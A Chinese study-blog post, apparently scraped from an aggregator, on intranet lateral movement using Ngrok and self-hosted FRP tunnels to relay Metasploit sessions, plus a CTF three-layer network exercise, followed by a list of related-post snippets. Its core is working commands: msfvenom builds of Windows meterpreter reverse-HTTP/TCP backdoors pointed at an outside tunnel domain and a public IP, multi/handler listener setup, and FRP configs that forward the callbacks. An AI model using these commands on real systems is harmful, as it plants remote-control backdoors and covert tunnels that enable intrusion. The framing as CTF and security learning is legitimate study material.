内网安全学习(六)—域横向-内网漫游: Socks 代理
内网安全-域横向内网漫游 Socks 代理隧道技术
1.前置知识:
1)正向与反向连接:
正向就是你去连接被控主机,但由于机器处于内网内,分配的内网ip,无法直接找到,所以需要方向连接,即让主机连接我们的服务器公网ip。
2)内网穿透代理、隧道技术:
隧道是为了解决流量分析/检测工具/防火墙等工具的过滤问题,而代理是为了解决网络连通性问题。
2.内网穿透Ngrok工具开通隧道—两个内网通讯上线:
首先去ngrok上买个免费的服务隧道,自行修改ip与端口,之后会映射到此ip与端口:
然后打开客户端,输入id,登录上分配给的免费服务器,启用成功。到这一步我们就已经可以实现内网连接通信了,那个地址直接就会映射到我们设置的ip与端口上。如果本机内网搭建的web服务,那么其他主机只要输入url就可以访问我们的网站了,前提端口得设置好。
我们通过手机流量就可以访问到本机内网搭建的web服务了,而且也可以在界面实时看到请求和状态码,很有趣:
接下来学习如何进一步利用此服务器实现攻击:
首先将服务映射端口分给虚拟机kali的ip与端口,用kali作为攻击机:
linux上启动:
./sunny clientid (你的id)
然后msf生成后门文件test.exe,需要修改lhost为自己的值,因为通过此地址传输流量反馈给kali攻击机:
msfvenom -p windows/meterpreter/reverse_http lhost=muguang.free.idcfengye.com lport=80 -f exe -o test.exe
msf监听流量:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.0.105
set lport 4444
exploit
然后将后门放到其他任意内网内的主机运行,我们可以监控到触发:
原理就是那个服务器做转发,运行木马,先向服务器地址发送请求在转到我们的内网地址,发送给我们设置要映射到的ip及端口,实现kali与目标机的内网互通,进而实现攻击。
3.内网穿透Frp自建跳板测试-两个内网通讯上线:
自行搭建,方便修改,成本低,使用多样化。
1)服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)
服务器修改配置文件 frps.ini:
[common]
bind_port = 6677
启动服务端:
./frps -c ./frps.ini
2)控制端-下载-解压-修改-启动:
控制端修改配置文件 frpc.ini:
[common]
server_addr = 你的云主机 ip
server_port = 6677 #frpc 工作端口,必须和上面 frps 保持一致
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 5555 #转发给本机的 5555
remote_port = 6000 #服务端用 6000 端口转发给本机
启动客户端:
./frpc -c ./frpc.ini
msfvenom -p windows/meterpreter/reverse_tcp lhost=101.37.160.211 lport=6000 -f exe -o frp.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 5555
exploit
3)靶机运行 frp 即可。
先开启服务端,在客户端开启后就能看到连接成功:
此时也就实现了内网穿透,访问服务器的6000端口就会转发映射给我们的本机5555端口。
进一步制作监听后门利用:
记得msf监听端口:
成功执行,实现自己frp搭建跳板完成内网转发。
frp使用手册:https://gofrp.org/docs/examples/
frp下载:https://github.com/fatedier/frp
4.CFS 三层内网漫游安全测试演练–(某CTF线下 2019)
网络环境如此,三台三个flag,最后一个不联网;用到 内网结合 WEB 攻防题库,涉及 WEB 攻击,内网代理路由等技术。
思路:检测/添加路由、正反向连接、进程代理访问 以及漏扫、生成后门等
工具:SocksCap64、Proxifier、proxychains-ng、nps
具体操作流程可以参考:
https://www.yuque.com/glan/xiaodisec/snfb19#jjgz8
三层内网漫游
内网安全学习(六)—域横向-内网漫游: Socks 代理相关推荐
- 内网安全-域横向内网漫游Socks代理隧道技术
因为是两个局域网 当你用kali生成一个后门文件放到目标主机 设置后门的反弹地址时,设置为你的外网地址时,后们会将信息反弹到你的路由器上 设置为内网地址时,又找不到你 案例 1-内网穿透 Ngrok ...
- 【内网安全】域横向内网漫游Socks代理隧道技术
代理技术和隧道技术都属于内网穿透,代理主要解决内网里面通信的问题(比如对方在内网,你也在内网,这时候两个内网实现通信就必须要经过代理才能实现,常见工具有frp.ngrok和ew等,ew(earthwo ...
- 免费学python的网课-学习python的时候观看网课学习还是买书学习效率高?
看书.学习网络课程,以及参加课堂培训,本来就没有冲突呀!为什么还有此问? 如果你想快速地学会编程,建议你: 1.首先买一两本经典的编程书先自己看,按照书籍描述自己敲代码. 尽量按照书本中的章节来构建自 ...
- 内网安全:Socks 代理 || 本地代理 技术.
内网安全:Socks 代理 || 本地代理 技术. Socks 代理又称全能代理,就像有很多跳线的转接板,它只是简单地将一端的系统连接到另外一端.支持多种协议,包括http.ftp请求及其它类型的请求 ...
- 内网渗透测试 MSF搭建socks代理
环境搭建: 最终效果为如此,web服务器可以ping通外网和内网两台服务器 外网打点 信息收集 发现端口: 80 http 3306 mysql 敏感目录: /phpMyadmin 数据库弱口令 ro ...
- 内网渗透建立代理通道(如何攻击目标内网机器?)-Socks代理(゚益゚メ) 渗透测试
文章目录 搭建靶场 配置虚拟机网络 虚拟机 上线目标1(Target1) Socks代理 简介 正向代理 反向代理 FRP 一层代理 二层代理(多层代理) EW 正向代理 反向代理 二层代理流量转发 ...
- p66 内网安全-域横向批量atschtasksimpacket
数据来源 本文仅用于信息安全的学习,请遵守相关法律法规,严禁用于非法途径.若观众因此作出任何危害网络安全的行为,后果自负,与本人无关. 基本概念 DMZ区域:称为"隔离区",也称' ...
- 内网安全学习(二)---横向渗透
域横向批量 at&schtasks&impacket 权限提升的思路以在之前博客已介绍过,在后渗透中更推荐 :先信息收集 再提权 再进行内网渗透 的思路,此篇及之后着重学习内网渗透技术 ...
- 内网域横向PTHPTKPTT哈希票据传递
内网域横向PTH&PTK&PTT哈希票据传递 文章目录 内网域横向PTH&PTK&PTT哈希票据传递 PTH,PTT,PTK概念: 总结:KB2871997 补丁后的影 ...
最新文章
- linux的git命令,linux命令实战安装git、配置git、创建仓库、部署项目
- wxWidgets:键盘 wxWidgets 示例
- centos7 docker安装和使用_入门教程
- 快速傅里叶变换(FFT)——按时间抽取DIT的基
- Nagios添加主机监控失败-故障小结
- php-fpm配置文件,指定session保存目录
- 广州大学计算机技术复试c语言试题,广州大学C语言程序设计期末考试试卷含答案...
- 主键与主键索引的关系
- 如何入门单片机C语言
- python更改下载源地址
- Deepflow 初步架构
- 使用openGL,用Bresenham算法画椭圆
- 新手做独立站需要掌握哪些技能
- av_read_frame
- js 利用input实现复制
- 如何查看Tomcat是否安装配置成功
- Unity3d 周分享(13期 2019.3.23 )
- 端到端OCR-ABCNet论文笔记
- OSChina 周二乱弹 ——追妹子最管用的方式
- HotSpot 是啥?